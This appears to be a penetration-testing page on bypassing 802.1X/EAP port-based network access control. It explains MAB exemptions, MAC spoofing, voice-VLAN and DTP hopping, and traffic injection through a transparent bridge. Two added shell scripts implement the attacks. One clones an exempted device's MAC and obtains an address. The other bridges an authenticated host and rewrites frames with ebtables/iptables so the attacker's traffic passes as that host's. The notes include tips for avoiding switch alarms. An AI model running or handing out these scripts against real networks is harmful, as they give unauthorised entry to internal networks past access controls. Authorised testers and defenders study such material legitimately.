802.1X / EAP Bypass
Physical port-based network access control
The new device has to authenticate in order to access the network beyond the switch
SUPPLICANT : The new device
AUTHENTICATOR : The switch (or Wireless AP)
AUTHENTICATION SERVER : The server responsible for checking credentials (Usually a RADIUS server)
EAP (Extensible Authentication Protocol) defines the authentication message formats
LOTS of different methods (EAP-MD5, EAP-TLS, EAP-TTLS, EAP-PSK, etc…)
Some are very weak (LEAP, EAP-MD5: no server authentication, password material exposed to offline dictionary attacks)
EAP is NOT a wire protocol
EAP messages are encapsulated by other protocols
EAPoL = EAP over LAN
PEAP = Protected EAP (mainly used on Windows systems)
To use NAC with 802.1X, every device that authenticates to the network must support the EAP method in use and run the necessary supplicant software. Devices that cannot do 802.1X at all, or do not support the EAP type in use (printers, IP phones, cameras and other embedded devices), are usually exempted instead, typically through MAC Authentication Bypass (MAB) or a static exception on their switch port. Those exemptions are tied to a MAC address and a physical port only, which creates a bypass opportunity for an attacker who can reach the port.
The Authenticator defines 2 logical ports per physical port
Uncontrolled port
Controlled port
The uncontrolled port passes EAPOL frames only (the 802.1X frames themselves)
The Authenticator relays the EAP messages they carry to the Authentication Server
The controlled port stays blocked until authentication succeeds, then acts like a “normal” port
The network is fully accessible
From this point, any packet can go wherever it needs to on the network without further authentication
802.1x only acts as a gatekeeper: if a device is compromised when already connected to the LAN, 802.1x protection is useless.
802.1x is not a solution to protect a LAN against BYOD hazards: the compromised device will authenticate against 802.1x as usual.
It is also possible to retrieve credentials/certificates from legitimate devices (a stored password or an exportable client certificate on a compromised workstation)
Online brute force of credentials is not practical: the attacker has no network access while unauthenticated, and the authenticator enforces a quiet period after failed attempts
It is possible to spoof the MAC address of the following devices and obtain network access:
Physical devices like old VoIP phones, printers, cameras, etc. may not support 802.1x authentication; the MAC addresses assigned to these devices (exempted via MAB or a static port exception) can be spoofed to obtain an IP address. The real device has to be unplugged from the port first.
Physical access to 802.1x-exempted VoIP phones, printers, etc. may disclose MAC and IP information from the network settings menu, stickers on the back of the device, etc.
The boot menu of certain workstations, laptops, etc. may disclose the MAC address.
CDP can be abused to hop into the voice VLAN and obtain an IP address there (the switch announces the voice VLAN to anything that looks like an IP phone).
VoIP Hopper can be used to execute this attack.
It is possible to hop VLANs by abusing DTP (negotiating a trunk with the switch).
frogger can be used to execute such attacks.
Fire up Wireshark and look for MAC addresses in wireless probe requests. Try spoofing a MAC gathered from a probe request.
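The MAC-spoofing step above, as an added example (not code from the original page). The interface name and the MAC are hypothetical placeholders, and the DHCP client is assumed to be dhclient; the part worth getting right is that the MAC must be changed while the link is down, and that the address may arrive in several notations (a sticker or Windows ipconfig prints AA-BB-CC-DD-EE-FF, a Cisco CLI prints aabb.ccdd.eeff, a capture prints aa:bb:cc:dd:ee:ff):

```shell
#!/bin/sh
# Borrow the identity of a device that is exempted from 802.1X (MAB / static port exception).
# Added example, not from the original page. IFACE and MAC below are hypothetical placeholders.

# normalize_mac: accept sticker / Windows (AA-BB-CC-DD-EE-FF), Cisco (aabb.ccdd.eeff) or
# capture (aa:bb:cc:dd:ee:ff) notation and return the canonical lowercase colon form.
# Returns 1 on anything that is not exactly 12 hex digits.
normalize_mac() {
  hex=$(printf '%s' "$1" | tr -d ':.-' | tr 'A-F' 'a-f')
  [ ${#hex} -eq 12 ] || return 1
  case "$hex" in *[!0-9a-f]*) return 1 ;; esac
  printf '%s' "$hex" | sed 's/\(..\)/\1:/g; s/:$//'
}

# spoof_mac IFACE MAC: the kernel only lets the address change while the link is down.
# Bringing the link back up produces the link-up event the switch expects after the real
# device was unplugged; a MAB port then re-learns "the printer" from our DHCP traffic.
spoof_mac() {
  iface="$1"
  mac=$(normalize_mac "$2") || { echo "bad MAC: $2" >&2; return 1; }
  ip link set dev "$iface" down
  ip link set dev "$iface" address "$mac"
  ip link set dev "$iface" up
  # DHCP with the borrowed MAC: a reservation, if any, follows the MAC, so we usually get
  # the device's own address back. If the device used a static IP, set it manually instead.
  dhclient -v "$iface"   # assumption: dhclient is installed; udhcpc/dhcpcd work the same way
}

# usage: sh spoof.sh spoof eth0 AA-BB-CC-DD-EE-FF   (needs root)
if [ "${1:-}" = spoof ]; then spoof_mac "$2" "$3"; fi
```

Unplug the real device before bringing the spoofed interface up: two ports claiming the same MAC cause MAC flapping, which is both noisy in the switch logs and a common NAC alarm.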
In a post-connect scenario you are admitted to the network for a short period of time while a set of posture checks is run against your endpoint. If the endpoint fails to meet the requirements, it is no longer allowed to use any resource.
802.1x provides Network Access Control. It does NOT provide traffic encryption (many people believe it does). It does NOT provide per-packet authentication.
Traffic Injection : spoof a legitimate and authenticated supplicant’s MAC and IP address to send packets that look like that host's own. It still works today in a vast majority of cases (especially in traditional Windows environments), because once the controlled port is open nothing checks who is actually behind the MAC and IP.
Traffic Injection is the most reliable technique to physically attack a 802.1x network
You need 2 interfaces for this: one plugged into the switch port, one plugged into the legitimate host, with the attacker's machine bridging them transparently so the host keeps authenticating as before.
Frames at “A” : appear to be coming from the legitimate host
Frames at “B” : appear to be coming from the network
Frames at “C” : appear to be addressed to the legitimate host
Frames at “D” : appear to be addressed to the network
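A script that builds the bridge described above, as an added example (not from the original page). It follows the well-known Linux bridge plus ebtables/iptables approach: first a silent transparent bridge that lets the legitimate host's EAPOL through, then NAT rules that make the attacker's own flows leave with the host's MAC and IP (frames at "D" look like the host's) and that pull the replies for those flows back out of the bridge path (frames at "B" addressed to the host are claimed only when they hit our private port window). Interface names, MACs, IPs and the port window are hypothetical placeholders; the legitimate host's and gateway's addresses are assumed to have been learned passively with tcpdump on the bridge beforehand. DRY_RUN=1 prints the commands instead of running them.

```shell
#!/bin/sh
# Transparent 802.1X bridge with traffic injection. Added example, not from the original page.
# Every address and interface name is a hypothetical placeholder; rule syntax is the legacy
# ebtables/iptables one, so check it against the versions installed on the attacking box.

SW_IF="${SW_IF:-eth0}"       # cable from the 802.1X switch port
HOST_IF="${HOST_IF:-eth1}"   # cable to the legitimate, already-authenticated supplicant
BR="${BR:-br0}"
LEGIT_MAC="${LEGIT_MAC:-00:11:22:33:44:55}"   # learned passively on HOST_IF
LEGIT_IP="${LEGIT_IP:-10.0.0.50}"
GW_IP="${GW_IP:-10.0.0.1}"
GW_MAC="${GW_MAC:-00:aa:bb:cc:dd:ee}"         # learned passively (ARP replies on SW_IF)
ATTACK_MAC="${ATTACK_MAC:-02:00:00:00:00:01}" # locally administered; never on the wire unrewritten
ATTACK_IP="${ATTACK_IP:-169.254.66.66}"       # only ever exists inside our own box
PORT_LO=61000; PORT_HI=62000                  # source-port window that marks our own flows

# run: execute, or just print when DRY_RUN=1 (review or test the rule set without root)
run() {
  if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Phase 1: a bridge that emits nothing of its own. The supplicant must still be able to
# complete EAP through us, otherwise the switch never opens the controlled port.
bridge_silent() {
  run ip link add name "$BR" type bridge
  run ip link set dev "$SW_IF" master "$BR"
  run ip link set dev "$HOST_IF" master "$BR"
  # Linux bridges drop 802.1D link-local multicast by default. EAPOL goes to
  # 01:80:C2:00:00:03, so bit 3 (0x8) of group_fwd_mask must be set or the supplicant
  # never sees EAP-Request/Identity and the port stays unauthorised.
  run sh -c "echo 8 > /sys/class/net/$BR/bridge/group_fwd_mask"
  # No IPv6 router solicitations or neighbour discovery leaking from any of our interfaces
  for i in "$BR" "$SW_IF" "$HOST_IF"; do
    run sysctl -q -w "net.ipv6.conf.$i.disable_ipv6=1"
  done
  run ip link set dev "$BR" address "$ATTACK_MAC"
  run ip link set dev "$SW_IF" up
  run ip link set dev "$HOST_IF" up
  run ip link set dev "$BR" up
}

# Phase 2 (only after the host has re-authenticated; watch EAPOL with tcpdump -i "$SW_IF" ether proto 0x888e):
# our own packets impersonate the host, and replies in our port window are routed to us.
inject_rules() {
  run ip addr add "$ATTACK_IP/32" dev "$BR"
  # Static neighbour and routes so the box never ARPs for the gateway under its own identity
  run ip neigh replace "$GW_IP" lladdr "$GW_MAC" dev "$BR" nud permanent
  run ip route replace "$GW_IP" dev "$BR"
  run ip route replace default via "$GW_IP" dev "$BR"
  # L2: everything our stack sends towards the switch leaves with the legitimate host's MAC
  run ebtables -t nat -A POSTROUTING -o "$SW_IF" -s "$ATTACK_MAC" \
      -j snat --to-source "$LEGIT_MAC" --snat-target ACCEPT
  # L2: never emit locally generated frames towards the legitimate host
  run ebtables -A OUTPUT -o "$HOST_IF" -j DROP
  # L3: our flows take the host's IP, confined to a source-port window the host itself
  # does not use (check its ephemeral range: Windows defaults to 49152-65535, so pick
  # a window below that on Windows-heavy networks)
  for proto in tcp udp; do
    run iptables -t nat -A POSTROUTING -o "$BR" -s "$ATTACK_IP" -p "$proto" \
        -j SNAT --to-source "$LEGIT_IP:$PORT_LO-$PORT_HI"
    # Replies arrive addressed to the host's MAC/IP. BROUTING "redirect" rewrites the
    # destination MAC to the bridge's and DROP here means "route locally", so conntrack
    # can undo the SNAT; everything outside the window is bridged to the host untouched.
    run ebtables -t broute -A BROUTING -i "$SW_IF" -p IPv4 --ip-dst "$LEGIT_IP" \
        --ip-proto "$proto" --ip-dport "$PORT_LO:$PORT_HI" -j redirect --redirect-target DROP
  done
}

# usage: sh bridge.sh silent   (plug in, wait for EAP success)   then   sh bridge.sh inject
case "${1:-}" in
  silent) bridge_silent ;;
  inject) inject_rules ;;
esac
```

Two practical checks before phase 2: confirm with tcpdump on the switch-side interface that you see EAP-Success and then ordinary traffic from the host (if the port stays silent, group_fwd_mask did not take effect or the supplicant fell back to a timeout), and confirm that nothing with ATTACK_MAC ever appears on that interface. Outbound-only connectivity is what this gives you; the legitimate host continues to receive everything outside the port window, so listening services on the attacker box are not reachable from the network without further rules.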